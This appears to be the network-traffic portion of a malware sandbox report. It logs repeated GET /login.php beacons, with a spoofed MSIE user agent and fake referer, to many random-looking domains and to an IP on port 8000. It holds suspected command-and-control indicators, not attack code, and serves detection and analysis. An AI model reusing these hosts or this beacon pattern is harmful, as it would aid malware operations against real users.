Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20241112-0413-1393-8b92-799b17a46fa8 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345193.2353053
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20241112-0413-1304-9c25-d9b9aac71030 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345193.2353053
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20241112-0413-361d-880c-38de75da0bbf HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345193.2353053; parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
